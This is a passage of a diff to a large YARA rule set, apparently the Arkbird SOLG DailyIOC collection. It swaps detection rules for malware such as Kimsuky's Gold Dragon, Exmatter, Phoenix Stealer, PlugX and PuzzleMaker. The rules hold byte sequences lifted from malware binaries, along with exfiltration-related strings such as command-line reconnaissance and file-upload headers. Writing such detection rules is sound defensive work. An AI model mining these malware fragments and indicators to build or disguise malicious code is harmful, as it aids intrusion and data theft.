00 00 00 e8 55 9f ff ff 33 d2 33 c9 41 b8 3f 00 0f 00 ff 15 d5 1e 07 00 48 8b f8 48 85 c0 75 19 ff 15 5f 20 07 00 8b d0 48 8d 0d de b5 08 00 e8 49 f6 ff ff e9 be 00 00 00 4c 8d 8c 24 80 00 00 00 48 83 bc 24 98 00 00 00 08 4c 0f 43 8c 24 80 00 00 00 48 8d 15 33 7a 0a 00 4c 8b c2 48 83 3d 40 7a 0a 00 08 4c 0f 43 05 20 7a 0a 00 48 0f 43 15 18 7a 0a 00 48 89 74 24 60 48 89 74 24 58 48 89 74 24 50 48 89 74 24 48 48 89 74 24 40 4c 89 4c 24 38 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 c7 44 24 20 10 00 00 00 41 b9 ff 01 0f 00 48 8b c8 ff 15 23 1e 07 00 48 8b f0 48 85 c0 75 16 ff 15 bd 1f 07 00 8b d0 48 8d 0d 5c b5 08 00 e8 a7 f5 ff ff eb 15 48 8d 0d 6e b5 08 00 e8 99 f5 ff ff 48 8b ce ff 15 e0 1d 07 00 48 8b cf ff 15 d7 1d 07 00 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 54 9e ff ff 90 45 33 c0 b2 01 48 8b cb e8 46 9e ff ff 48 8b 8c 24 d0 02 00 00 48 33 cc e8 d6 94 02 00 4c 8d 9c 24 e0 02 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f }
-		$seq_ConnectC2 = { 33 c0 48 89 44 24 70 48 89 44 24 78 66 89 7c 24 70 8d 48 35 ff 15 2f 62 07 00 66 89 44 24 72 48 8b cb e8 ea dc ff ff 48 8b c8 ff 15 29 62 07 00 89 44 24 74 49 8b cd e8 d5 dc ff ff 48 8b d0 c7 44 24 28 10 00 00 00 48 8d 44 24 70 48 89 44 24 20 45 33 c9 45 8b 45 10 49 8b cc ff 15 e0 61 07 00 83 f8 ff 75 12 45 33 c0 48 8d 15 6b cb 08 00 48 8b ce e8 79 de ff ff 4c 89 a4 24 a8 00 00 00 c7 84 24 a0 00 00 00 01 00 00 00 48 c7 44 24 38 0a 00 00 00 41 8d 4c 24 01 48 8d 44 24 38 48 89 44 24 20 45 33 c9 45 33 c0 48 8d 94 24 a0 00 00 00 ff 15 aa 61 07 00 83 f8 01 0f 94 c0 84 c0 0f 84 0f 01 00 00 45 33 c9 41 b8 00 02 00 00 48 8d 94 24 b0 02 00 00 49 8b cc ff 15 72 61 07 00 4c 63 c0 85 c0 0f 8e ea 00 00 00 41 8b c8 49 8b d0 49 8b c0 45 85 c0 0f 8e d8 00 00 00 0f 1f 44 00 00 80 bc 04 b0 02 00 00 00 0f 85 b7 00 00 00 48 3b d0 0f 84 ae 00 00 00 85 c9 0f 84 b4 00 00 00 83 c1 03 41 3b c8 0f 8d a8 00 00 00 48 8d 9c 24 b0 02 00 00 48 03 da 48 63 c1 48 8d bc 24 b0 02 00 00 48 03 f8 4c 89 b4 24 90 00 00 00 4c 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 0a dd ff ff 48 3b fb 74 17 48 2b df 4c 8b c3 48 8b d7 48 8d 8c 24 80 00 00 00 e8 6f dd ff ff 90 48 8d 84 24 80 00 00 00 48 3b f0 74 18 49 83 c9 ff 45 33 c0 48 8d 94 24 80 00 00 00 48 8b ce e8 2a de ff ff 90 45 33 c0 b2 01 48 8d 8c 24 80 00 00 00 e8 b7 dc ff ff 48 8b 5c 24 48 bf }
-		$seq_RegisterEvent = { 40 53 48 83 ec 20 48 83 3d 5a 79 0a 00 08 48 8d 1d 3b 79 0a 00 48 8b cb 48 8d 15 91 01 00 00 48 0f 43 0d 29 79 0a 00 ff 15 93 1d 07 00 48 89 05 44 77 0a 00 48 8b c8 48 85 c0 75 2d 48 83 3d 24 79 0a 00 08 48 0f 43 1d 04 79 0a 00 48 8b d3 ff 15 7b 1d 07 00 48 85 c0 74 62 48 8b c8 ff 15 35 1d 07 00 48 83 c4 20 5b c3 33 c0 c7 05 db 76 0a 00 10 00 00 00 48 89 05 e0 76 0a 00 48 8d 15 cd 76 0a 00 8b 05 17 1c 0a 00 89 05 d5 76 0a 00 ff c0 89 05 09 1c 0a 00 48 c7 05 b2 76 0a 00 02 00 00 00 c7 05 bc 76 0a 00 b8 0b 00 00 ff 15 06 1d 07 00 48 83 c4 20 5b }
+		$pdb = "\\AuroraVNC\\VedioDriver\\Release\\VedioDriver.pdb"
+		$pdb1 = "\\Aurora_Src\\AuroraVNC\\Avc\\Release\\AVC.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of ( $s* ) and 2 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
+/*
+ * YARA Rule Set
+ * Repository Name: Arkbird SOLG
+ * Repository: https://github.com/StrangerealIntel/DailyIOC
+ * Retrieval Date: 2025-06-15
+ * Git Commit: a873ff1298c43705e9c67286f3014f4300dd04f7
+ * Number of Rules: 215
+ * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * NO LICENSE SET
+ */
 
 rule ARKBIRD_SOLG_TA505_Bin_21Nov_1 : FILE
 {
@@ -146792,1151 +146955,1734 @@ rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_2 : FILE
 	condition:
 		uint16( 0 ) == 0xcfd0 and filesize < 5000KB and 1 of ( $x* ) and 4 of them
 }
-rule ARKBIRD_SOLG_APT_Kimsuky_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_Mal_Plugx_Thor_July_2021_1 : FILE
 {
 	meta:
-		description = "Detect Gold Dragon used by Kimsuky APT group"
+		description = "Detect Thor variant of PlugX (Variant 1)"
 		author = "Arkbird_SOLG"
-		id = "dd79aa3b-0bbc-5fdd-808e-c2dee6d89804"
-		date = "2020-08-31"
-		modified = "2020-09-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-09-14/Kimsuky/APT_Kimsuky_Aug_2020_1.yar#L1-L23"
+		id = "5447e5df-0326-5987-905b-bfc49acee05a"
+		date = "2021-07-27"
+		modified = "2021-07-28"
+		reference = "https://unit42.paloaltonetworks.com/thor-plugx-variant/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-27/PlugX/Mal_PlugX_Thor_July_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "4644ea81535c867a36a882bb270cea784ae135e7acc7078823be0579b1746932"
+		logic_hash = "f94e6cf8a1169526a438dfbf4d6b40f4ce0f6af6eee2e893fb138b81c4172c73"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "4ff2a67b094bcc56df1aec016191465be4e7de348360fd307d1929dc9cbab39f"
-		hash2 = "97935fb0b5545a44e136ee07df38e9ad4f151c81f5753de4b59a92265ac14448"
+		hash1 = "125fdf108dc1ad6f572cbdde74b0c7fa938a9adce0cc80cb5ce00f1c030b0c93"
+		hash2 = "690c488a9902978f2ef05aa23d21f4fa30a52dd9d11191f9b49667cd08618d87"
+		hash3 = "3c5e2a4afe58634f45c48f4e800dc56bae3907dde308ff97740e9cd5684d1c53"
+		hash4 = "a9cbce007a7467ba1394eed32b9c1774ad09a9a9fb74eb2ccc584749273fac01"
+		tlp = "white"
+		adversary = "Chinese APT group"
 
 	strings:
-		$s1 = "/c systeminfo >> %s" fullword ascii
-		$s2 = "/c dir %s\\ >> %s" fullword ascii
-		$s3 = ".?AVGen3@@" fullword ascii
-		$s4 = { 48 6f 73 74 3a 20 25 73 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 25 73 25 73 0d 0a 25 73 0d 0a 25 73 }
-		$s5 = "%s?filename=%s" fullword ascii
-		$s6 = "Content-Disposition: form-data; name=\"userfile\"; filename=\"" fullword ascii
-		$s7 = "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG" fullword ascii
-		$s8 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
-		$s10 = "\\Microsoft\\HNC" fullword ascii
-		$s11 = "Mozilla/5.0" fullword ascii
+		$s1 = { 55 8b ec 81 ec ?? 01 00 00 a1 00 [2] 10 33 c5 89 45 [2-10] 85 ?? fe ff ff [0-1] c6 85 ?? fe ff ff 5c c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff }
+		$s2 = { 8b ?? ?? fe ff ff c6 ?? 00 [3-5] fe ff ff [4-10] fe ff ff }
+		$s3 = { fe ff ff 6a 40 68 00 10 00 00 8b 95 ?? fe ff ff 52 6a 00 ff 95 ?? fe ff ff 89 85 ?? fe ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 150KB and 8 of them
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_EXF_Exmatter_Nov_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Puzzlemaker_Implant_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect packed Exmatter with Confuser"
+		description = "Detect the implant of the PuzzleMaker group"
 		author = "Arkbird_SOLG"
-		id = "ddae7776-3202-50e6-b8af-0e5d15373386"
-		date = "2021-11-01"
+		id = "9387130c-4474-55bf-9736-09494a5e81b8"
+		date = "2021-06-10"
 		modified = "2021-11-01"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Exmatter/EXF_Exmatter_Nov_2021_1.yara#L1-L22"
+		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Implant_Jun_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "67aaac3db488a9e28897047a7498b7a447ec63cdb6da82cb3d4217c7d615f176"
-		score = 50
+		logic_hash = "e54eaaa76b2d370a27a232dee2299266f8b3b82d53da36e35c2a6fcdd7d5b1f7"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "b6bc126526e27c98a94aab16989864161db1b3a75f18bd5c72bacbdfccad7bd7"
-		hash2 = "8eded48c166f50be5ac33be4b010b09f911ffc155a3ab76821e4febd369d17ef"
-		hash3 = "325ecd90ce19dd8d184ffe7dfb01b0dd02a77e9eabcb587f3738bcfbd3f832a1"
-		level = "Experimental"
-		tlp = "white"
-		adversary = "RaaS"
+		hash1 = "8a17279ba26c8fbe6966ea3300fdefb1adae1b3ed68f76a7fc81413bd8c1a5f6"
+		hash2 = "1ee9bb4e8bcabe197399b654dbf940438b120af1c376719ff9bdccf2bb1dc606"
+		hash3 = "f2ce2a00de8673f52d37911f3e0752b8dfab751b2a17e719a565b4083455528e"
+		tlp = "White"
+		adversary = "PuzzleMaker"
 
 	strings:
-		$s1 = { 45 38 42 44 32 35 45 33 46 35 33 34 39 39 41 43 31 39 42 44 42 34 31 45 37 36 45 38 36 38 39 37 38 39 31 31 42 43 35 41 44 46 37 36 34 33 31 38 33 45 34 38 36 33 38 32 42 44 33 42 42 44 30 30 00 35 41 41 34 30 37 35 37 33 42 34 43 36 45 43 43 41 45 35 36 44 30 46 35 43 34 33 35 34 36 32 33 39 38 43 30 41 46 42 35 33 46 36 44 36 32 33 31 44 38 39 34 44 34 44 31 41 37 46 44 36 45 30 30 00 42 33 39 46 43 34 39 41 36 31 35 36 45 37 31 35 45 38 42 39 37 41 35 30 46 44 34 35 46 45 34 36 38 37 30 37 38 44 42 44 31 45 45 43 46 46 44 39 46 38 35 31 34 30 42 35 33 31 36 45 39 32 31 30 00 44 33 30 39 45 32 43 32 30 31 43 37 35 43 43 30 38 43 35 33 36 42 41 34 30 32 31 45 41 35 37 43 45 42 34 44 30 34 34 39 32 36 30 31 36 46 46 39 39 46 45 44 45 36 31 35 34 36 31 30 41 32 31 30 00 36 43 37 35 38 36 33 43 32 46 39 38 44 37 46 41 45 33 36 45 37 44 46 43 45 38 46 31 39 45 43 39 35 41 46 30 30 43 43 42 33 44 43 39 39 39 31 38 46 42 38 43 30 42 35 38 39 42 30 42 34 35 31 30 }
-		$s2 = { 33 44 33 32 31 41 45 42 34 33 39 35 36 30 34 38 46 35 43 37 35 41 38 42 38 36 36 35 32 34 33 34 44 31 33 31 30 31 31 32 45 37 44 36 42 37 38 46 42 37 35 44 39 33 35 36 31 44 31 31 30 39 38 31 00 34 39 44 38 32 36 38 33 30 42 35 44 39 32 30 34 34 38 46 37 34 42 42 42 45 44 42 33 36 31 46 31 37 43 39 44 44 34 36 31 45 30 44 43 33 44 45 44 31 31 34 45 36 45 31 33 45 30 31 37 33 39 38 31 00 31 45 42 30 38 30 36 38 33 30 39 37 41 32 37 46 42 37 34 33 46 36 32 44 30 38 33 38 44 34 42 41 36 34 33 35 46 44 43 33 38 38 32 41 36 41 36 37 45 46 42 43 32 32 34 45 37 31 42 44 42 43 38 31 00 46 39 45 39 31 44 44 39 44 32 36 32 38 43 43 32 39 32 42 41 43 32 36 35 39 41 35 35 34 34 42 38 42 46 42 30 41 44 31 46 38 31 30 30 43 37 35 45 38 32 44 44 33 42 32 43 45 44 30 35 43 37 39 31 00 45 44 44 31 45 32 34 31 37 36 33 46 34 33 33 35 30 38 37 42 39 38 41 44 30 37 35 38 44 36 39 33 31 39 32 42 37 37 45 44 37 32 41 39 36 43 38 42 33 35 41 45 31 39 34 41 45 38 45 39 31 41 39 31 00 38 43 46 31 34 42 43 33 42 46 39 44 36 31 30 30 43 41 38 41 }
-		$s3 = "SSH_MSG_NEWKEYS" ascii
-		$s4 = { 35 45 46 32 31 35 39 31 38 33 32 30 41 44 38 41 46 41 41 30 32 35 33 35 35 34 36 46 34 34 33 43 38 44 30 39 46 30 41 44 35 31 33 37 45 35 32 30 33 34 32 38 38 43 37 36 39 41 43 36 42 41 44 46 00 44 36 32 45 45 38 34 39 37 41 45 34 39 35 41 33 31 31 34 35 41 37 37 41 35 43 39 44 35 35 37 30 34 43 30 38 38 33 42 30 31 35 46 45 31 41 45 39 46 44 46 46 45 32 30 38 46 31 33 46 41 45 44 46 00 31 35 32 30 33 33 46 38 33 46 37 46 41 36 36 34 35 31 39 33 42 33 32 32 43 43 42 31 36 37 32 46 30 38 39 35 36 42 36 38 43 33 38 44 31 33 32 46 32 32 37 38 46 43 46 30 46 41 30 34 44 46 45 46 00 33 41 33 36 41 46 34 41 46 30 41 31 46 45 35 37 39 35 44 42 39 39 46 41 38 44 33 39 34 46 41 32 44 38 39 30 41 32 32 35 32 38 30 41 38 41 31 35 39 41 43 37 39 46 31 45 34 38 45 45 31 38 46 46 00 44 43 37 42 45 38 33 42 33 45 46 46 38 31 45 38 43 39 45 30 36 46 37 44 37 43 31 46 34 42 44 37 33 34 46 32 30 32 30 41 34 32 34 32 39 45 32 32 41 32 36 31 42 30 45 45 45 31 36 44 31 39 46 46 }
-		$s5 = { 39 38 41 43 30 38 30 44 38 38 37 45 31 34 43 43 39 32 32 44 34 35 37 43 33 42 31 30 35 35 37 31 45 33 36 41 37 35 43 43 39 31 31 42 33 35 46 36 30 43 32 46 35 30 36 44 44 44 45 43 35 43 41 46 00 31 33 46 33 37 31 33 43 30 38 42 33 30 43 45 34 37 36 35 37 33 45 43 31 38 32 39 30 31 32 35 30 45 39 36 42 34 37 37 35 33 31 39 46 34 36 41 38 41 30 30 41 34 46 31 45 42 38 41 43 35 32 42 46 00 43 39 38 39 33 42 41 33 46 43 31 46 41 39 41 37 43 38 37 33 42 32 37 38 37 41 41 41 44 38 38 39 45 33 38 46 30 43 33 39 36 39 45 37 41 32 37 42 30 44 33 37 45 30 41 }
-		$s6 = "SSH_MSG_KEX_DH_GEX_INIT" ascii
+		$s1 = { 4c 8d 4c 24 5c 49 8b ce 48 8d 95 c0 00 00 00 ff 15 21 01 04 00 85 c0 74 28 4c 8d 4c 24 58 4c 89 64 24 20 41 b8 00 04 00 00 48 8d 95 c0 04 00 00 49 8b cf ff 15 b5 fe 03 00 85 c0 0f 85 25 ff ff ff ff 15 77 fe 03 00 8b }
+		$s2 = { 40 55 53 56 41 55 41 57 48 8d ac 24 a0 fe ff ff 48 81 ec 60 02 00 00 48 8b 05 5a 1c 03 00 48 33 c4 48 89 85 30 01 00 00 48 8b 85 b0 01 00 00 4c 8b f9 48 8b b1 b8 00 00 00 4c 8b ad c8 01 00 00 48 83 c6 07 48 89 44 24 60 48 8b 85 d0 01 00 00 48 89 45 98 8b 85 c0 01 00 00 83 c0 fd 48 c1 ee 03 4c 89 4d 80 4c 89 45 88 48 89 55 90 83 f8 06 0f 87 84 03 00 00 48 8d 15 f3 6b fd ff 48 98 8b 8c 82 b0 97 02 00 48 }
+		$s3 = { 48 8d 1d 98 3d 02 00 0f 57 c0 48 89 bc 24 58 02 00 00 33 c0 c7 44 24 68 01 00 00 00 0f 11 85 80 00 00 00 4c 8b c6 c7 85 8c 00 00 00 10 27 00 00 48 8d 95 a0 00 00 00 48 89 44 24 70 49 8b c9 48 89 44 24 78 0f 11 45 20 0f 11 45 30 0f 11 45 40 0f 11 45 50 0f 11 45 60 0f 11 45 70 0f 11 85 90 00 00 00 e8 57 58 fe ff 8b f8 85 c0 0f 85 62 02 00 00 49 8b 87 b8 00 00 00 48 8d 4c 24 68 48 8b 54 24 60 48 83 c0 07 48 c1 e8 03 4c 89 a4 24 50 02 00 00 4c 8b a5 b8 01 00 00 4c 3b e0 4c 89 b4 24 48 02 00 00 4d 8b f4 4c 0f 47 f0 4d 8b c6 e8 1b 57 fe ff 8b f8 85 c0 75 54 49 8b 87 b8 00 00 00 4a 8d 14 f5 00 00 00 00 48 }
+		$s4 = { 85 ff 0f 85 cd 01 00 00 48 8b 4d 90 48 8d 45 a0 48 89 44 24 50 45 33 c9 48 8d 45 d0 4d 8b c7 48 89 44 24 48 33 d2 4c 89 64 24 40 4c 89 64 24 38 c7 44 24 30 00 00 00 08 c7 44 24 28 01 00 00 00 4c 89 64 24 20 ff 15 62 1c 04 00 85 c0 75 3a ff 15 38 1d 04 00 44 8b c3 48 8b ce 8b d0 8b f8 e8 d1 09 00 00 48 8b 4d 80 ff 15 07 1d 04 00 48 8b 4d 88 ff 15 fd 1c 04 00 48 8b 4d 90 ff 15 f3 1c 04 00 }
+		$s5 = { 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec 28 02 00 00 48 8b 05 5d 0a 04 00 48 33 c4 48 89 84 24 10 02 00 00 48 8b ac 24 90 02 00 00 0f 57 c0 4c 8b ac 24 98 02 00 00 33 db 45 32 e4 4c 89 4c 24 58 4c 89 44 24 70 49 8b f9 48 89 6c 24 68 4d 8b c8 4c 89 6c 24 60 4c 8b fa 48 8b f1 44 8b f3 0f 11 84 24 e0 00 00 00 c7 84 24 ec 00 00 00 10 27 00 00 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 0f 11 84 24 c0 00 00 00 0f 11 84 24 d0 00 00 00 0f 11 84 24 f0 00 00 00 48 85 ed 75 47 4c 8b 81 b8 00 00 00 48 8d 05 a1 c2 ff ff 48 89 44 24 68 48 8d 8c 24 80 00 00 00 49 83 c0 07 48 8d 84 24 80 00 00 00 49 c1 e8 03 49 8b d1 48 89 44 24 60 e8 87 c2 ff ff 8b f8 85 c0 0f 85 ee 01 00 00 48 8b 7c 24 58 48 8d 56 68 48 8d 4f 18 e8 7b 4a ff ff 85 c0 75 15 48 8d 56 50 48 8b cf e8 6b 4a ff ff 85 c0 75 05 40 b5 }
+		$s6 = { 41 b9 01 00 00 00 c7 44 24 20 00 00 00 f0 45 33 c0 48 8d 4c 24 60 33 d2 ff 15 11 06 04 00 85 c0 74 28 48 8b 4c 24 60 4c 8d 85 b0 00 00 00 ba 20 00 00 00 ff 15 ee 05 04 00 48 8b 4c 24 60 33 d2 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 600KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Phoenix_Stealer_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Puzzlemaker_Launcher_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect the Phoenix Stealer"
+		description = "Detect the launcher of the PuzzleMaker group"
 		author = "Arkbird_SOLG"
-		id = "8c9df216-cbfe-51f3-a6d7-cfeb99fafbe0"
-		date = "2021-11-01"
+		id = "ae31d9de-8e6c-5c1b-bc45-bc4e50cea00f"
+		date = "2021-06-10"
 		modified = "2021-11-01"
-		reference = "https://twitter.com/3xp0rtblog/status/1455111070566207493/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Phoenix_Stealer/MAL_Phoenix_Stealer_Jun_2021_1.yara#L1-L20"
+		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Launcher_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "989c2518a42201559265ce4b974b35df5c4b8365e53f789fc124ee969e747c87"
+		logic_hash = "5c717ca5c57a86e1b5db45b3d581a45be248d45820c00c40c57a001ac07ce1b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "5bbfeee67b9b087ed228eccdacd4a7e71d40f7f96ad869903e02d9c3b02adbe5"
-		hash2 = "34f78f4028c51f6340c1f4846b65252fa6686ba0a5ab8ebc35c737a8960ba43e"
-		hash3 = "e51de8c43034fafaa49f81e9cc955c0cf60dc9684f28d8c355baf0724710de1f"
+		hash1 = "982f7c4700c75b81833d5d59ad29147c392b20c760fe36b200b541a0f841c8a9"
 		tlp = "White"
-		adversary = "-"
+		adversary = "PuzzleMaker"
 
 	strings:
-		$s1 = { 6a 16 58 0f be c8 88 85 b0 fe ff ff c7 85 d8 fe ff ff 42 73 7a 73 c7 85 dc fe ff ff 71 64 77 7b c7 85 e0 fe ff ff 38 73 6e 73 c6 85 e4 fe ff ff 00 e8 aa 73 ff ff 89 85 94 }
-		$s2 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s" ascii
-		$s3 = { b8 c9 11 47 00 e8 c3 c5 01 00 68 f8 d7 47 00 33 db 53 53 ff 15 cc 20 47 00 53 50 89 85 d0 fc ff ff ff 15 d0 20 47 00 85 c0 0f 85 92 02 00 00 6a 01 ff 15 8c 22 47 00 84 c0 79 f4 53 e8 e2 aa 00 00 50 e8 1e 98 00 00 8b 35 84 22 47 00 8d 85 ec fe ff ff 59 59 50 53 53 6a 1c 53 ff d6 8d 8d ec fe ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 ec fe ff ff 51 50 b9 f0 5b 48 00 e8 bf 0e 00 00 8d 85 e8 fd ff ff 50 68 04 01 00 00 ff 15 40 20 47 00 8d 8d e8 fd ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e8 fd ff ff 51 50 b9 08 5c 48 00 e8 89 0e 00 00 8d 85 e4 fc ff ff 50 53 53 6a 1a 53 ff d6 8d 8d e4 fc ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e4 fc ff ff 51 50 b9 90 5b 48 00 e8 57 0e 00 00 8b fb 89 9d dc fc ff ff 8b f3 89 bd d4 fc ff ff 89 b5 d8 fc ff ff 83 65 fc 00 33 c9 6a 16 5a 41 e8 71 05 ff ff 8b cf 89 85 e0 fc }
-		$s4 = { 6a 01 ff 15 98 22 47 00 85 c0 74 5d 6a 00 ff 15 a0 22 47 00 85 c0 74 51 56 6a 01 ff 15 94 22 47 00 8b f0 85 f6 74 3b 56 ff 15 38 21 47 00 8b d0 85 d2 74 27 8b ca 57 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 6a 03 51 8b 0d 6c 72 48 00 52 ba 58 d7 47 00 e8 95 1b fe ff 83 c4 0c 5f 56 ff 15 64 21 47 00 }
-		$s5 = { 81 ec 14 02 00 00 a1 0c 50 48 00 33 c5 89 45 fc 53 56 8b d9 be 19 27 00 00 57 8b 7d 0c 83 fb ff 75 0c e8 bb eb ff ff 89 37 89 47 04 eb 17 ff 75 08 52 53 ff 15 bc 22 47 00 85 c0 8b cf 0f 95 c2 e8 b8 fe ff ff e8 98 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 75 08 81 3f 34 27 00 00 74 20 e8 80 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 0f 85 b9 00 00 00 81 3f 33 27 00 00 0f 85 ad 00 00 00 83 fb ff 75 0c e8 5b eb ff ff 89 37 e9 99 00 00 00 33 c0 89 9d f8 fd ff ff 40 89 9d fc fe ff ff 89 85 f4 fd ff ff 89 85 f8 fe ff ff 8d 85 f8 fe ff ff 6a 00 50 8d 85 f4 fd ff ff 50 6a 00 8d 43 01 50 ff 15 d8 22 47 00 8b f0 8b cf 85 f6 0f 98 c2 e8 2a fe ff ff 85 f6 78 53 83 a5 f0 fd ff ff 00 8d 85 ec fd ff ff 50 8d 85 f0 fd ff ff c7 85 ec fd ff ff 04 00 00 00 50 68 07 10 00 00 68 ff ff 00 00 53 ff 15 b0 22 47 00 8b f0 8b cf 85 f6 0f 95 c2 e8 e8 fd ff }
+		$s1 = { 4c 89 6d bf 48 8d 45 bf 48 89 44 24 20 4c 8d 0d f9 45 01 00 33 d2 44 8d 42 01 48 8d 0d dc 45 01 00 ff 15 56 44 01 00 8b d8 85 c0 78 c6 4c 89 6d c7 48 8b 45 bf 48 8b 08 4c 8b 79 18 b9 18 00 00 00 e8 9b 04 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 32 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8d 0d 15 fb 01 00 ff 15 cf 43 01 00 48 89 03 48 85 }
+		$s2 = { 44 89 6c 24 38 4c 89 6c 24 30 c7 44 24 28 03 00 00 00 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 4d c7 ff 15 f6 42 01 00 85 c0 0f 88 bb 01 00 00 48 8d 0d 1d fa 01 00 ff 15 c1 42 01 00 4c 8b f8 48 8d 0d 1b fa 01 00 ff 15 b1 42 01 00 4c 8b e0 4c 89 6d df 48 8b 4d c7 48 8b 11 4c 8b 52 30 4c 89 6c 24 28 48 8d 45 df 48 89 44 24 20 45 33 c9 45 33 c0 49 8b d4 41 ff d2 4c 89 6d e7 48 8b 4d df 48 8b 01 4c 89 6c 24 20 4c 8d 4d e7 45 33 c0 49 8b d7 ff 90 98 00 00 00 4c 89 6d cf 48 8b 4d e7 48 8b 01 4c 8d 45 cf 33 d2 ff 50 78 b8 08 00 00 00 66 89 45 ef 8d 48 10 e8 dc 02 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 33 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8b ce ff 15 14 42 01 00 48 89 03 48 85 c0 75 0e 48 85 }
+		$s3 = { 4c 8d 05 75 0e 02 00 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 0f b6 d0 42 0f b6 0c 12 66 41 31 08 74 12 ff c0 49 83 c0 02 83 f8 20 72 e7 0f 1f 80 00 00 00 00 0f b7 05 49 09 02 00 48 8d 0d 76 09 02 00 66 d1 e8 66 83 e0 7f 66 0f 6f 15 f3 d4 01 00 66 89 05 2c 09 02 00 0f b7 05 27 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 19 09 02 00 0f b7 05 14 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 06 09 02 00 0f b7 05 01 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f3 08 02 00 0f b7 05 ee 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e0 08 02 00 0f b7 05 db 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 cd 08 02 00 0f b7 05 c8 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 ba 08 02 00 0f b7 05 b5 08 02 00 66 d1 e8 66 83 e0 7f f3 0f 6f 05 bc 08 02 00 66 89 05 9f 08 02 00 0f b7 05 9a 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 8c 08 02 00 0f b7 05 87 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 79 08 02 00 0f b7 05 74 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 66 08 02 00 0f b7 05 61 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 53 08 02 00 0f b7 05 4e 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 40 08 02 00 0f b7 05 3b 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 2d 08 02 00 0f b7 05 28 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 1a 08 02 00 0f b7 05 15 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 07 08 02 00 0f b7 05 02 08 02 00 66 d1 e8 66 83 